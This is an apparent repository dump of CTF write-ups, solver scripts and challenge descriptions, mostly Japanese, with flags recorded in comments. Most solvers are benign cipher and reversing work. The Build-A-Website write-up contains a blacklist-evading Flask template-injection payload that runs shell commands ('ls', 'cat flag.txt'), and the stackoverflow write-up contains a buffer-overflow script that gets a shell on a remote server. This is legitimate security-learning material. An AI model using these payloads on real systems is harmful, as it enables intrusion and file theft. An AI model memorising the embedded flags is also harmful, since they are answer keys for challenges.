"no_license", "max_line_length": 99, "num_lines": 19, "path": "/2020/kksctf_open_2020/Lynx/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nリンク先にブラウザ(Chrome)でアクセスすると以下のように表示される。\n\n![](img/2020-12-13-12-58-24.png)\n\nCLIベースのWebブラウザである`Lynx`を使えばアクセスできそう。\n\n* https://ja.wikipedia.org/wiki/Lynx_(ウェブブラウザ)\n\nLynxでこのページへアクセスすると、内容が表示される。\n\n![](img/2020-12-13-13-04-04.png)\n\n次に、`http://tasks.kksctf.ru:30070/robots.txt`にアクセスすると、`/a4d81e99fda29123aee9d4bb`というディレクトリがあることがわかる。\n\n`http://tasks.kksctf.ru:30070/a4d81e99fda29123aee9d4bb`にアクセスしたらフラグが得られた。\n\n<!-- kks{s0m3_CLI_br0ws3rs_4r3_us3ful} -->" }, { "alpha_fraction": 0.6866764426231384, "alphanum_fraction": 0.7086383700370789, "avg_line_length": 55.91666793823242, "blob_id": "b2304fdad2a9539a55b75811befce23d836f1375", "content_id": "500f0d42355bcdc171ff2546ee658b1416567c2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 683, "license_type": "no_license", "max_line_length": 132, "num_lines": 12, "path": "/2021/WeCTF_2021/CSP_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Shame on Shou if his web app has XSS vulnerability. More shame on him if he does not know how to use CSP correctly. \n \nThis challenge requires user interaction. Send your payload to [uv.ctf.so](https://uv.ctf.so/) Flag is in cookies of admin (Shou). \n \nHint: Search Content-Security-Policy if you don't know what that is and check your browser console.\n\nHost 1 (San Francisco): [csp1.sf.ctf.so](http://csp1.sf.ctf.so/) \nHost 2 (Los Angeles): [csp1.la.ctf.so](http://csp1.la.ctf.so/) \nHost 3 (New York): [csp1.ny.ctf.so](http://csp1.ny.ctf.so/) \nHost 4 (Singapore): [csp1.sg.ctf.so](http://csp1.sg.ctf.so/)\n\n[Source Code](https://storage.googleapis.com/wectf21-chall/csp1.zip)\n" }, { "alpha_fraction": 0.4751131236553192, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 24.5, "blob_id": "4554da9b3896190438f414994bca5e2c5f77a741", "content_id": "01071248b5bc9acc15382c22cfb118987ca5b09e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "no_license", "max_line_length": 54, "num_lines": 26, "path": "/2021/WaniCTF21-spring/Easy/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import itertools\n\ndef encrypt(plaintext: str, a: int, b: int) -> str:\n ciphertext = \"\"\n for x in plaintext:\n if \"A\" <= x <= \"Z\":\n x = ord(x) - ord(\"A\")\n x = (a * x + b) % 26\n x = chr(x + ord(\"A\"))\n ciphertext += x\n\n return ciphertext\n\nif __name__ == \"__main__\":\n ciphertext = \"HLIM{OCLSAQCZASPYFZASRILLCVMC}\"\n\n for i,j in itertools.product(range(26),range(26)):\n c = encrypt(\"FLAG{\", a=i, b=j)\n if c == \"HLIM{\":\n break\n\n for _ in range(26):\n ciphertext = encrypt(ciphertext,a=i, b=j)\n if \"FLAG{\" in ciphertext:\n print(ciphertext)\n break\n" }, { "alpha_fraction": 0.6834170818328857, "alphanum_fraction": 0.80402010679245, "avg_line_length": 38.79999923706055, "blob_id": "3d08e3d07edbfaa305c6fb1e81772f55449709f2", "content_id": "6deb921a494995f39f4ceb4f24dd4f8e79ef70b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 199, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/DawgCTF_2021/The_Obligatory_RSA_Challenge/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Would 
you believe last year someone complained because we didn't have any RSA challenges?\n\nAuthor: trashcanna\n\n[rsa.txt](https://umbccd.io/files/4d9b8700f3b31d672989a24363420ce8/rsa.txt?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjE4fQ.YJYXcw.s3Y6r-haOM1_6F0S2jOJD7iejSY)\n" }, { "alpha_fraction": 0.483091801404953, "alphanum_fraction": 0.5024154782295227, "avg_line_length": 14.923076629638672, "blob_id": "6a148543ffc87123173e90ebeaa7d4f8f9f3ee3c", "content_id": "c5889c3d6721883c4ef8d13cd812065a9d918190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/2021/redpwnCTF_2021/round-the-bases/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\n\nc = open('round-the-bases','r').read()\nc = c.split('7D')\n\nb = ''\nfor d in c:\n if 'IIcu' in d:\n b += '0'\n else:\n b += '1'\n\nprint(long_to_bytes(int(b,2)))\n" }, { "alpha_fraction": 0.5141993761062622, "alphanum_fraction": 0.6574018001556396, "avg_line_length": 25.26984214782715, "blob_id": "d6f654277b6bd5540b58e2531a2300f8c69e01e0", "content_id": "9a73cb3ef85ae2d8476680174f2a3a1c48833fb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1933, "license_type": "no_license", "max_line_length": 222, "num_lines": 63, "path": "/2021/BCACTF_2.0/Wait_this_isnt_C/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file flag_checker_1\nflag_checker_1: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=44db315a94752488b3ace72816fef8393c9db3fd, for GNU/Linux 3.2.0, not stripped\n```\n\nGhidraで解析する。以下、while中のif文に入らないような条件を探る。\n\n```c\n while (local_a < 0x1a) {\n auStack168[(long)local_a + -1] = local_a + auStack168[(long)local_a + -1];\n if (auStack168[(long)local_a + -1] != local_48[(long)local_a + -1]) {\n local_2b0 = \"flag_checker_1.f90\";\n local_2a8 = 0x2b;\n local_2b8 = 0x80;\n local_2b4 = 6;\n _gfortran_st_write(&local_2b8);\n _gfortran_transfer_character_write(&local_2b8,\"Sorry, flag does not match.\",0x1b);\n _gfortran_st_write_done(&local_2b8);\n _gfortran_exit_i4(&DAT_00102054);\n }\n local_a = local_a + 1;\n }\n local_2b0 = \"flag_checker_1.f90\";\n local_2a8 = 0x30;\n local_2b8 = 0x80;\n local_2b4 = 6;\n _gfortran_st_write(&local_2b8);\n _gfortran_transfer_character_write(&local_2b8,\"Congrats, that was the flag!\",0x1c);\n _gfortran_st_write_done(&local_2b8);\n return;\n```\n\nまず、if文の中に入らないようにバイナリエディタを使ってJZをJMPに書き換える。\n\n```\n001013c2 74 76 JZ LAB_0010143a\n\n↓\n\n001013c2 EB 76 JMP LAB_0010143a\n```\n\n値を変えて、レジスタの中身を確認してみたところ、if文に差し掛かった時の`RCX+RAX-RDX`の値が`flag`になっていそうなので1文字ずつ表示する。\n\n```gdb\nb *(MAIN__)+0x13bf-0x11b9\ndisp $rcx+$rax-$rdx\n```\n\n```py\nflag=[0x62,0x63,0x61,0x63,0x74,0x66,0x7b,0x66,0x30,0x72,0x74,0x72,0x34,0x4e,0x5f,0x69,0x35,0x5f,0x63,0x30,0x6f,0x4f,0x30,0x6c,0x7d]\n\nfor f in flag:\n print(chr(f),end='')\n```\n\nフラグが得られた。\n\n<!-- bcactf{f0rtr4N_i5_c0oO0l} -->\n" }, { "alpha_fraction": 0.45093944668769836, "alphanum_fraction": 0.46972858905792236, "avg_line_length": 16.10714340209961, "blob_id": "f44833564d437d6f2e0751d3063facef7421261f", "content_id": "c67465669cbd4a947eec3e686f6a41b2fa0bb5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", 
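The JZ-to-JMP patch described in the Wait_this_isnt_C writeup above can be scripted instead of done by hand in a hex editor; a sketch (mine) that assumes the listing's 0x13c2 virtual offset maps 1:1 to the file offset, which is typical for a small PIE text segment:

```py
data = bytearray(open("flag_checker_1", "rb").read())

OFFSET = 0x13C2                 # from the 001013c2 line in the listing above
assert data[OFFSET] == 0x74     # JZ rel8 expected here; bail out otherwise
data[OFFSET] = 0xEB             # JMP rel8 reuses the same displacement byte

open("flag_checker_1_patched", "wb").write(data)
```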
"length_bytes": 479, "license_type": "no_license", "max_line_length": 40, "num_lines": 28, "path": "/2020/CyberSecurityRumble2020/Zeh/haupt_trans.c", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define forloop(n) for (int i = n; i--;)\n#define rightshift(n, m) (n) >> (m)\n#define xor(n, m) (n) ^ (m)\n\nvoid main(void) {\n int i = rand();\n int k = 13;\n int e;\n int * p = & i;\n\n printf(\"%d\\n\", i);\n fflush(stdout);\n scanf(\"%d %d\", & k, & e);\n\n forloop(7)\n k = rightshift(* p, k % 3);\n\n k = xor(k, e);\n\n if(k == 53225)\n puts(Fahne);\n else\n puts(\"War wohl void!\");\n}\n" }, { "alpha_fraction": 0.4502262473106384, "alphanum_fraction": 0.5056561231613159, "avg_line_length": 22.891891479492188, "blob_id": "a297c999ecdfac81cf697b57df62280d7aa4cd2a", "content_id": "693ef5ade83d96199efa957b4603b93cb58a7d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/2021/dCTF_2021/Bell/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ndef main(uVar2:int):\n process(uVar2)\n\ndef process(param_1:int):\n local_24 = 1\n while local_24 <= param_1:\n lVar3 = triangle(param_1, local_24)\n print(lVar3)\n io.sendline(str(lVar3))\n local_24 += 1\n\ndef triangle(param_1:int, param_2:int):\n if param_1 < param_2:\n ret = 0\n else:\n if param_1 == 1 and param_2 == 1:\n ret = 1\n else:\n if param_2 == 1:\n ret = triangle(param_1 -1, param_1 -1)\n else:\n ret2 = triangle(param_1, param_2 -1)\n ret1 = triangle(param_1 -1, param_2 -1)\n ret = ret1 + ret2\n return ret\n\nif __name__ == \"__main__\":\n io = remote('dctf-chall-bell.westeurope.azurecontainer.io','5311')\n var = int(io.recvline())\n print(var)\n\n main(var)\n \n print(io.recvall())\n io.close()\n" }, { "alpha_fraction": 0.7317073345184326, "alphanum_fraction": 0.7987805008888245, "avg_line_length": 22.428571701049805, "blob_id": "eadd82ed778a3bc1ee52d181afc5d90e52d17a54", "content_id": "79bc3148aa98fb377d853b90dea723920169944b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 224, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/WaniCTF21-spring/binary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "* 文字も所詮1と0の集合です。\n\n* sample.pyを参考に復号器を作ってみてください。\n\n[mis-binary.zip](https://score.wanictf.org/storage/ilk0qu92ecmaktxaolohic41j7oi443m/mis-binary.zip)\n\nWriter : saru\n" }, { "alpha_fraction": 0.35387489199638367, "alphanum_fraction": 0.514472484588623, "avg_line_length": 22.2391300201416, "blob_id": "7216078b650d1f64de61d12db3d4e0311a883efd", "content_id": "a08f92bac7c3f837f10760e734b1aeeb5164e967", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1301, "license_type": "no_license", "max_line_length": 108, "num_lines": 46, "path": "/2021/RaRCTF_2021/minigen/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムと出力結果が与えられる。\n\n```py\nexec('def f(x):'+'yield((x:=-~x)*x+-~-x)%727;'*100)\ng=f(id(f));print(*map(lambda c:ord(c)^next(g),list(open('f').read())))\n```\n\n```\n281 547 54 380 392 98 158 440 724 218 406 672 193 457 694 208 455 745 196 450 724\n```\n\n暗号化は`((x:=-~x)*x+-~-x)%727 * 
ord(c)`によって行われている。\n\n`x:=-~x`は`x>0`のとき`x:=x+1`に等しいので、`x`の値は`f(x)`の中で1ずつ増えていく。\n\nまた、`((x:=-~x)*x+-~-x)%727`を変形すると、`((x+1)*(x+1)+(-x))%727 = (x^2 + x + 1)%727`となる。\n\n差は`f(x+1)-f(x) = 2x + 2 (mod 727)`であり`x`によって決まる固定値を取り続けるので、差が同じになるような`ord(c)`の`c`を見つける。\n\n```py\nimport string\n\nCHAR = string.printable\n\nct = [281, 547, 54, 380, 392, 98, 158, 440, 724, 218, 406, 672, 193, 457, 694, 208, 455, 745, 196, 450, 724]\nflag = 'ra' # rarctf{\n\ns, t, u = ct[0]^ord('r'), ct[1]^ord('a'), ct[2]^ord('r')\nd = (t-s)%727\ndiff = ((u-t)%727 - d)\n\nfor idx in range(2,len(ct)):\n for c in CHAR:\n u = ct[idx]^ord(c)\n if d + diff == (u-t)%727:\n flag += c\n d = (u-t)%727\n s = t\n t = u\n break\nprint(flag)\n```\n\n<!-- rarctf{pyg01f_1s_fun} -->\n\n\n" }, { "alpha_fraction": 0.48603352904319763, "alphanum_fraction": 0.5865921974182129, "avg_line_length": 34.79999923706055, "blob_id": "f466ba427e1511af8c9c39ee9274c80e101b7ebe", "content_id": "41df1bfc8dfd0428311ec5c32b73957995634c04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/2021/HeroCTF_v3/Atoms/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "c = \"MtMdDsFmMdHsMdMdUuo\"\natoms = { \"Mt\": 109, \"Md\": 101, \"Ds\": 110, \"Fm\": 100, \"Hs\": 108, \"Uuo\": 118}\nfor key, value in atoms.items():\n c = c.replace(key,chr(value))\nprint(c)\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 17.600000381469727, "blob_id": "1fd120db7abf6f61b4f9f3c613980ccc18b6f920", "content_id": "f7533ac099ab82cd8de5bee81aef88803793659e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 93, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/2021/UIUCTF_2021/phpfuck/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "i hate php\n\n[http://phpfuck.chal.uiuc.tf](http://phpfuck.chal.uiuc.tf/)\n\n**author**: arxenix\n" }, { "alpha_fraction": 0.7325581312179565, "alphanum_fraction": 0.8372092843055725, "avg_line_length": 56.33333206176758, "blob_id": "243da115f1cb2c83beb692acaab6d4626046afbb", "content_id": "f313e3571fb2ce27098ccb6c293e1028d46302e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 131, "num_lines": 3, "path": "/2021/dCTF_2021/Encrypted_the_flag_I_have/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Decrypted flag is not in exact format.\n\n[EncryptedTheFlagIHave.png](https://dctf.dragonsec.si/files/3724ec93c46d68ba337d1fa0006fddcb/EncryptedTheFlagIHave.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6OTN9.YJ7IKw.XcuVyWpnIsVryOzovb9lCDls3dg)\n" }, { "alpha_fraction": 0.6468085050582886, "alphanum_fraction": 0.6753799319267273, "avg_line_length": 26.88135528564453, "blob_id": "830b5655ace0231dcfe9e5a9b7ac0f017f1f0c15", "content_id": "ddbf2d37f51445e5c26ba9c2f62d8e6c49e6da16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1859, "license_type": "no_license", "max_line_length": 151, "num_lines": 59, "path": "/2021/ImaginaryCTF_2021/Build-A-Website/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のソースコードが与えられる。\n\n```py\n#!/usr/bin/env 
python3\n\nfrom flask import Flask, render_template_string, request, redirect, url_for\nfrom base64 import b64encode, b64decode\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n # i dont remember how to return a string in flask so\n # here goes nothing :rooNervous:\n return render_template_string(open('templates/index.html').read())\n\[email protected]('/backend')\ndef backend():\n website_b64 = b64encode(request.args['content'].encode())\n return redirect(url_for('site', content=website_b64))\n\[email protected]('/site')\ndef site():\n content = b64decode(request.args['content']).decode()\n #prevent xss\n blacklist = ['script', 'iframe', 'cookie', 'document', \"las\", \"bas\", \"bal\", \":roocursion:\"] # no roocursion allowed\n for word in blacklist:\n if word in content:\n # this should scare them away\n content = \"*** stack smashing detected ***: python3 terminated\"\n csp = '''<head>\\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'none'\">\\n</head>\\n'''\n return render_template_string(csp + content)\n```\n\nFlask の SSTI が使えることが分かった。\n\n`global`の`bal`等がブラックリストに登録されているが、`a = 0x61`とすればすり抜けられる。\n\n以下を入力すると、\n\n```\n{{request['application']['\\x5f\\x5fglob\\x61ls\\x5f\\x5f']['\\x5f\\x5fbuiltins\\x5f\\x5f']['\\x5f\\x5fimport\\x5f\\x5f']('os')['popen']('ls')['read']()}}\n```\n\n```\napp.py flag.txt templates\n```\n\nと表示された。\n\nよって、以下を入力することにより、`flag.txt`の中身を見ることができる。\n\n```\n{{request['application']['\\x5f\\x5fglob\\x61ls\\x5f\\x5f']['\\x5f\\x5fbuiltins\\x5f\\x5f']['\\x5f\\x5fimport\\x5f\\x5f']('os')['popen']('cat flag.txt')['read']()}}\n```\n\n<!-- ictf{:rooYay:_:rooPOG:_:rooHappy:_:rooooooooooooooooooooooooooo:} -->\n" }, { "alpha_fraction": 0.748031497001648, "alphanum_fraction": 0.7637795209884644, "avg_line_length": 41.66666793823242, "blob_id": "f3a5d08bb380b48ee7a1a7fe8e2d021d94cb08ee", "content_id": "3f1a33c7b8363a248d8b895b0861f6e49d7a15f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 127, "license_type": "no_license", "max_line_length": 87, "num_lines": 3, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Like in the good old days, but faster.\n\n[SSE_KEYGENME](https://kaf-public.s3-eu-west-1.amazonaws.com/SSE_KEYGENME/SSE_KEYGENME)" }, { "alpha_fraction": 0.6284152865409851, "alphanum_fraction": 0.6284152865409851, "avg_line_length": 17.399999618530273, "blob_id": "41efea4dbe502c7f52c2018110fdac2a5c8efb32", "content_id": "81d8e68a91ce6324e5087e72332a07ef2ab9984b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ncipher = open('encrypted.txt','r').read().split(' ')\nkey = 'd4c70f8a67d5456d'\nplain = b''\n\nfor c in cipher:\n plain += xor(bytes.fromhex(c),bytes.fromhex(key))\n\nprint(plain)" }, { "alpha_fraction": 0.525519847869873, "alphanum_fraction": 0.6729678511619568, "avg_line_length": 21.08333396911621, "blob_id": "a770a139febb6fd0f3fcd2ca76946541facc092f", "content_id": "c5a73ae121d95a3cdc2d3f721c8415d8f648f97c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 771, "license_type": "no_license", "max_line_length": 91, "num_lines": 24, "path": 
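The hex-escape trick in the Build-A-Website payloads above is worth spelling out: the raw payload never contains a blacklisted word, but Jinja decodes the escapes inside its string literals, so the attribute lookup still resolves. A quick local check in plain Python, no challenge service needed:

```py
# what the blacklist in site() sees: literal backslash-x sequences
payload = "{{request['application']['\\x5f\\x5fglob\\x61ls\\x5f\\x5f']}}"
print("__globals__" in payload)                        # False -> filter passes it

# what Jinja resolves after decoding the string literal
print("\x5f\x5fglob\x61ls\x5f\x5f" == "__globals__")   # True
```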
"/2021/UMassCTF_2021/PikCha/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nページにアクセスすると、ポケモンの画像と入力フォームが表示される。\n\n![](img/2021-03-28-13-03-35.png)\n\nソースコードが与えられていないので詳細は分からないが、ランダムに表示される画像のファイル名を当てると予想。試しに、`find . -name *`と入力したところカウントが1進んだ。\n\n![](img/2021-03-28-13-03-01.png)\n\n500回送るとフラグが表示された。\n\n```py\nimport requests\n\ndata = {'guess':'find . -name *'}\nwith requests.Session() as session:\n r = session.get(\"http://104.197.195.221:8084/\")\n for _ in range(500):\n r = session.post(\"http://104.197.195.221:8084/\",data=data)\n print(r.text)\n```\n\n<!-- UMASS{G0tt4_c4tch_th3m_4ll_17263548} -->" }, { "alpha_fraction": 0.7972350120544434, "alphanum_fraction": 0.8341013789176941, "avg_line_length": 23.11111068725586, "blob_id": "437878e5eca0b8e4ee03e451a66d2261d2663b1c", "content_id": "9b533bb4792d23280bf7abcdd3922c07d1c7ed82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 101, "num_lines": 9, "path": "/2021/WaniCTF21-spring/execute/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "コマンドを間違えて、ソースコードも消しちゃった!\n\n今残っているファイルだけで実行して頂けますか?\n\n(reverse engineeringすれば、実行しなくても中身は分かるみたいです。)\n\n[rev-execute.zip](https://score.wanictf.org/storage/xhtmi35ruy8xvkdyv2qpgps2jnpbsipr/rev-execute.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.7413793206214905, "alphanum_fraction": 0.7650862336158752, "avg_line_length": 30, "blob_id": "5f5222249343564645f2875b60dea4da91dc33a7", "content_id": "684f354073c56a8f04dcafff400293b383a0c4d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "no_license", "max_line_length": 200, "num_lines": 15, "path": "/2021/BCACTF_2.0/BCA_Mart/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "After the pandemic hit, everybody closed up shop and moved online. Not wanting to be left behind, BCA MART is launching its own digital presence. Shop BCA MART from the comfort of your own home today!\n\n[bca-mart.c](https://objects.bcactf.com/bcactf2/bca-mart/bca-mart.c)\n\n[bca-mart](https://objects.bcactf.com/bcactf2/bca-mart/bca-mart)\n\n`nc bin.bcactf.com 49153`\n\nHint 1 of 2\n\nHow do computers store numbers?\n\nHint 2 of 2\n\nHow do computers store negative numbers?" 
}, { "alpha_fraction": 0.6574585437774658, "alphanum_fraction": 0.7182320356369019, "avg_line_length": 15.454545021057129, "blob_id": "1dd79aef8999c61dc2984b3110ab712b13de6bea", "content_id": "93180c86a888f85a50ae7473e6bab2524d93bb94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 88, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Rock_Solid_Algorithm/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nSomething was the wrong size here...\n\n**Attachments**\n\n[https://imaginaryctf.org/r/3198-secure.txt](https://imaginaryctf.org/r/3198-secure.txt)\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8552036285400391, "avg_line_length": 30.428571701049805, "blob_id": "e7eb4b144097d2dbe1edb420696f14c1a8c10574", "content_id": "0433f8674c16776c502d9abb5f9742729fc1f8f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 383, "license_type": "no_license", "max_line_length": 101, "num_lines": 7, "path": "/2020/WaniCTF/ALLIGATOR_03/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dr.WANIはいつも同じパスワードを使うらしいです。\n\nDr.WANIのパソコンから入手したパス付のzipファイルを開けて、博士の秘密を暴いてしまいましょう。\n\n[wani_secret.zip](https://score.wanictf.org/storage/objbciviflccyrvhgqxffbykqqurjowv/wani_secret.zip)\n\n(ALLIGATOR_01で配布されているファイルを使ってください)\n\n" }, { "alpha_fraction": 0.6541353464126587, "alphanum_fraction": 0.7744361162185669, "avg_line_length": 28.66666603088379, "blob_id": "66f247cfafd8831b8f8dd78e6ed10d8dae02c836", "content_id": "b0de453e9dafce8172eaf3b56564db6a209c07d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 266, "license_type": "no_license", "max_line_length": 90, "num_lines": 9, "path": "/2021/justCTF_2020/25519/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "One time signatures, so you can spend your coins only once.\n\nPlease solve the task locally first and reach our server only for the flag :)\n\n```\nnc c25519.nc.jctf.pro 1337\n```\n\nhttps://ams3.digitaloceanspaces.com/justctf/6f7420f1-b591-47a0-98f2-40fd097c33de/task.sage" }, { "alpha_fraction": 0.4725363552570343, "alphanum_fraction": 0.6663973927497864, "avg_line_length": 32.76363754272461, "blob_id": "b34f8257aa166d7802e213dbc10fd550d261e9a3", "content_id": "5ec0152597a36ad2ead55724b068046880eb8bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3860, "license_type": "no_license", "max_line_length": 221, "num_lines": 110, "path": "/2021/ImaginaryCTF_2021/stackoverflow/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nELFファイルが与えられる。\n\n```\n$ file stackoverflow\nstackoverflow: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c7bd1104c0adbdb1357db265116844c7a1304c4e, not stripped\n```\n\n```\n$ ./stackoverflow\nWelcome to StackOverflow! Before you start ~~copypasting code~~ asking good questions, we would like you to answer a question. What's your favorite color?\nred\nThanks! 
Now onto the posts!\nERROR: FEATURE NOT IMPLEMENTED YET\n```\n\nGDBで解析したところ、以下の命令文を満たせばよいことが分かった。\n\n```\ncmp QWORD PTR [rbp-0x8],0x69637466\n```\n\n```\n[----------------------------------registers-----------------------------------]\nRAX: 0x0\nRBX: 0x555555554880 (<__libc_csu_init>: push r15)\nRCX: 0x7ffff7ed51e7 (<__GI___libc_write+23>: cmp rax,0xfffffffffffff000)\nRDX: 0x0\nRSI: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\nRDI: 0x5555555549a3 --> 0x6b6e616854007325 ('%s')\nRBP: 0x7fffffffde70 --> 0x0\nRSP: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\nRIP: 0x555555554825 (<main+107>: call 0x555555554690 <__isoc99_scanf@plt>)\nR8 : 0x9b\nR9 : 0x7ffff7fe0d50 (endbr64)\nR10: 0xf\nR11: 0x246\nR12: 0x5555555546b0 (<_start>: xor ebp,ebp)\nR13: 0x7fffffffdf60 --> 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x555555554816 <main+92>: mov rsi,rax\n 0x555555554819 <main+95>: lea rdi,[rip+0x183] # 0x5555555549a3\n 0x555555554820 <main+102>: mov eax,0x0\n=> 0x555555554825 <main+107>: call 0x555555554690 <__isoc99_scanf@plt>\n 0x55555555482a <main+112>: lea rdi,[rip+0x175] # 0x5555555549a6\n 0x555555554831 <main+119>: call 0x555555554660 <puts@plt>\n 0x555555554836 <main+124>: cmp QWORD PTR [rbp-0x8],0x69637466\n 0x55555555483e <main+132>: jne 0x55555555485f <main+165>\nGuessed arguments:\narg[0]: 0x5555555549a3 --> 0x6b6e616854007325 ('%s')\narg[1]: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\n0008| 0x7fffffffde48 --> 0x555555554880 (<__libc_csu_init>: push r15)\n0016| 0x7fffffffde50 --> 0x0\n0024| 0x7fffffffde58 --> 0x5555555546b0 (<_start>: xor ebp,ebp)\n0032| 0x7fffffffde60 --> 0x7fffffffdf60 --> 0x1\n0040| 0x7fffffffde68 --> 0x42424242 ('BBBB')\n0048| 0x7fffffffde70 --> 0x0\n0056| 0x7fffffffde78 --> 0x7ffff7deb0b3 (<__libc_start_main+243>: mov edi,eax)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x0000555555554825 in main ()\n```\n\noffset は 40 である。\n\n```\ngdb-peda$ xi $rbp-0x8\n0x7fffffffde68 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nVirtual memory mapping:\nStart : 0x00007ffffffde000\nEnd : 0x00007ffffffff000\nOffset: 0x1fe68\nPerm : rw-p\nName : [stack]\ngdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\nAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40\n```\n\n以下のコードを実行するとシェルが実行できるようになる。\n\n```py\nfrom pwn import *\n\nio = remote('chal.imaginaryctf.org', '42001')\n\npayload = p32(0x69637466)\n\nio.sendline(b'\\x00'*40 + payload)\nio.interactive()\n```\n\n```bash\n$ python3 